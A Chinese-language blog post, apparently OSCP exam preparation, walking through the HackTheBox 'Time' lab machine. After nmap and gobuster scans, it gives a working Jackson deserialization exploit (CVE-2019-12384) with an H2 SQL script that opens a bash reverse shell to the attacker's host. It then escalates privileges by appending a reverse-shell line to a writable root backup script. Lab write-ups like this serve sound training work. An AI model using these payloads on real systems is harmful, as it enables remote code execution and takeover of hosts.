OSCP备考_0x34_HackThBox靶机_time

Ethan医生2个月前靶场79

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.107.34  (扫描UDP)


image.png


gobuster dir -u http://10.129.107.34 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt.html

image.png



image.png

仔细看错误信息 然后进行突破

Google搜索 com.fasterxml.jackson.core 发现存在RCE

利用方式
https://github.com/jas502n/CVE-2019-12384
创建一个t.sql文件,内容如下



CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

        String[] command = {"bash", "-c", cmd};

        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");

        return s.hasNext() ? s.next() : "";  }

$$;

CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.16.38/3333 0>&1')


开启http服务后,在网页输入框中执行如下命令

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.16.38:8000/t.sql'"}]

image.png

上传linpeas.sh文件至目标机器
发现一个权限可疑的备份脚本


echo -e '\nbash -i >& /dev/tcp/10.10.16.38/3334 0>&1' >> /usr/bin/timer_backup.sh

由于一下就断开 直接上传SSH PUB 使用SSH登入

image.png

image.png

标签: OSCP

相关文章

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

OSCP备考_0x26_HackThBox靶机_Linux_magic

OSCP备考_0x26_HackThBox靶机_Linux_magic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x57_HackThBox靶机_Windows_Love

OSCP备考_0x57_HackThBox靶机_Windows_Love

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

OSCP备考_0x08_Vulnhub靶机_PwnLab: init

名称说明靶机下载链接https://www.vulnhub.com/entry/pwnlab-init,158/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon

OSCP备考_0x51_HackThBox靶机_Windows_ServMon10.129.227.77nmap -sCV -p- --min-rate 10000 -T4 -sS 10.1...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。